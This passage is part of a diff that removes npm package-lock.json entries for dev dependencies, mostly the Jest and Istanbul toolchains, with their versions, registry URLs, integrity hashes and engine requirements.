"https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "dependencies": { - "hasown": "^2.0.2" - }, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=", - "dev": true - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "dev": true, - "peerDependencies": { - "ws": "*" - } - }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jake": { - "version": "10.9.2", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", - "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", - "dev": true, - "dependencies": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - }, - "bin": { - "jake": "bin/cli.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "dev": true, - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=", - "dev": true 